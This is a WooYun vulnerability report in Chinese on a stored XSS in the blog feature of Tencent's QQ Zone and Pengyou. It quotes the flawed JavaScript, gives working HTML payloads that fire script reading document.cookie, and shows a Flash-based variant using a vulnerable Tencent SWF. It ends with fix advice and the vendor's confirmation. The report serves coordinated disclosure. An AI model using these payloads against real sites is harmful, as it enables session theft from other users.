PKAV腾讯专场 - 6. （QQ空间+朋友网）日志功能存储型XSS

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-013721

漏洞标题：PKAV腾讯专场 - 6. （QQ空间+朋友网）日志功能存储型XSS

漏洞作者： gainover

提交时间：2012-10-22 14:25

修复时间：2012-12-06 14:25

公开时间：2012-12-06 14:25

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-10-22：细节已通知厂商并且等待厂商处理中
2012-10-24：厂商已经确认，细节仅向厂商公开
2012-11-03：细节向核心白帽子及相关领域专家公开
2012-11-13：细节向普通白帽子公开
2012-11-23：细节向实习白帽子公开
2012-12-06：细节向公众公开

简要描述：

此漏洞影响腾讯2大主要的社区日志功能，QQ空间和朋友网的前端和后端是一套逻辑，就不分开提交了。漏洞相关信息日后会同步至pkav.net。

详细说明：

缺陷文件：
http://cnc.qzs.qq.com/qzone/newblog/v5/script/common.js
http://qzs.pengyou.com/qzone/newblog/v5/script/common.js
缺陷代码：

QZBlog.Logic.initMusicPlayer = function() {
    var arr = document.getElementsByName("musicFlash**");
    if (arr.length > 0) {
        var musicParams = [];
        for (var index = 0; index < arr.length; ++index) {
            var ubb = arr[index].getAttribute('ubb');
            if ( !! ubb) {
                musicParams.push(ubb);
                if (!QZFL.userAgent.ie) {
                    var is_multi = ubb.split("|").length > 7;
                    var width = arr[index].width;
                    var height = arr[index].height;
                    var _div_height = is_multi ? 200: 120;
                    var _div_width = is_multi ? 386: 360;
                    var src = 'http://' + IMGCACHE_DOMAIN + '/music/musicbox_v2_1/img/MusicFlash.swf';
                    var span = document.createElement('span');
                    span.style.cssText = 'display:inline-block; height:' + _div_height + 'px;width:' + _div_width + 'px; overflow:hidden; vertical-align:baseline';
                    var parent = arr[index].parentNode;
                    parent.replaceChild(span, arr[index]);
                    span.innerHTML = '<object type="application/x-shockwave-flash" data="' + src + '" width="' + width + '" height="' + height + '" name="musicFlash' + (musicParams.length - 1) + '" id="musicFlash' + (musicParams.length - 1) + '" align="middle" ubb="' + ubb + '">' + '<param name="movie" value="' + src + '" />' + '<param name="quality" value="high" />' + '<param name="bgcolor" value="#ffffff" />' + '<param name="play" value="true" />' + '<param name="loop" value="true" />' + '<param name="wmode" value="transparent" />' + '<param name="scale" value="showall" />' + '<param name="menu" value="true" />' + '<param name="salign" value="" />' + '<param name="allowScriptAccess" value="always" />' + '</object></span>';
                    index--;
                } else {
                    arr[index].id = "musicFlash" + (musicParams.length - 1);
                    if (QZFL.userAgent.ie < 9) {
                        arr[index].name = "musicFlash" + (musicParams.length - 1);
                    }
                }
            }
        }
        if (musicParams.length > 0) {
            var jsLoader = new QZONE.jsLoader();
            jsLoader.onload = function() {
                initMusicData.apply(null, musicParams);
            };
            jsLoader.load("/music/musicbox_v2_1/js/musicblog_player.js", document, "GB2312");
        }
    }
};

1. 首先看看上面这个代码。
2. 它的大致流程如下：
2.1 搜索日志里所有name="musicFlash**"的元素。然后循环对每一个元素处理
2.2 拿一次循环为例，可以看到取出了name="musicFlash**"元素的 ubb 属性。
2.3 而后，在span.innerHTML这段代码中， ubb="' + ubb + '" 这个地方直接加了进去。
2.4 因此这里没有做过滤，会造成XSS。
3. 那么利用代码怎么写呢？
因为日志功能是富文本，不可能屏蔽掉所有的HTML标签。div 标记一般是允许的。那么我们利用div来编写利用代码。

<div name="musicFlash**" ubb="&quot;&gt;&lt/object&gt;&lt;img src=&quot;1&quot; onerror=&quot;alert(document.cookie);&quot;&gt;&lt;i a=&quot;">xxxxxxxxx</div>

嗯，上面就是利用代码了，很简单吧，发日志的时候，选择使用HTML方式，发送即可。

其它用户访问日志后，效果如下：

打开调试工具，可以看到被inject进去的代码

4. 当然，还没完。。。因为上面这个代码缺陷，仅限于非IE浏览器，为什么呢？
主要是这句：如下图：

5. 我们的目标是：“没有蛀牙”，只有chrome下可以，有点鸡肋了。
6. 其实这里还存在一个问题。最初测试时，发现腾讯并没有过滤掉object标签，只是对object调用的swf文件的域进行了限制。也就是说，发送一下HTML，是不会被过滤掉的

<div class="blog_details_20120222"><div><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="410" height="100" src="http://qzs.qq.com/22222222222.swf" bgcolor="#ffffff" menu="true" allowScriptAccess="always" name="musicFlash**" id="musicFlash0" ubb='3041135817|1|http://1.qq.com/1"><img/src="1"onerror="alert(1)">'><param name="movie" value="http://qzs.qq.com/22222222222.swf" /><param name="data" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name="bgColor" value="#ffffff" /><param name="wmode" value="transparent" /><param name="menu" value="true" /><param name="allowScriptAccess" value="always" /></object><br></div></div>

只要 movie的value是 http://qzs.qq.com域名下即可
7. 更重要的是，这里的allowscriptaccess是等于always的。
8. 那么我们只要找到一个 http://qzs.qq.com 域名下，具有缺陷的FLASH XSS即可。
9. google , site:qzs.qq.com filetype:swf ，找到下面这个。

http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}

10. 接着我们在发布日志时，发布以下利用代码即可。

<div class="blog_details_20120222"><div><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="410" height="100" src="http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}" bgcolor="#ffffff" menu="true" allowScriptAccess="always" name="musicFlash**" id="musicFlash0" ubb='3041135817|1|http://1.qq.com/1"><img/src="1"onerror="alert(1)">'><param name="movie" value="http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}" /><param name="data" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name="bgColor" value="#ffffff" /><param name="wmode" value="transparent" /><param name="menu" value="true" /><param name="allowScriptAccess" value="always" /></object><br></div></div>

11. 看吧，这次IE也会弹啦。

漏洞证明：

见详细说明。

修复方案：

1. 修复 QZBlog.Logic.initMusicPlayer 中的缺陷，取出ubb属性后，进行二次过滤，再输出到innerHTML。
2. 这个object的always，你们自己看着修复。本身object标签就是很危险的，感觉不应该直接输出到页面。
3. 修复 http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}

版权声明：转载请注明来源 gainover@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2012-10-24 15:27

厂商回复：

非常感谢您的报告。这个问题我们已经确认，正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-013721

漏洞标题：PKAV腾讯专场 - 6. （QQ空间+朋友网）日志功能存储型XSS

相关厂商：腾讯

漏洞作者： gainover

提交时间：2012-10-22 14:25

修复时间：2012-12-06 14:25

公开时间：2012-12-06 14:25

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 gainover@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-013721

漏洞标题：PKAV腾讯专场 - 6. （QQ空间+朋友网）日志功能存储型XSS

相关厂商：腾讯

漏洞作者： gainover

提交时间：2012-10-22 14:25

修复时间：2012-12-06 14:25

公开时间：2012-12-06 14:25

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-013721"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 gainover@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：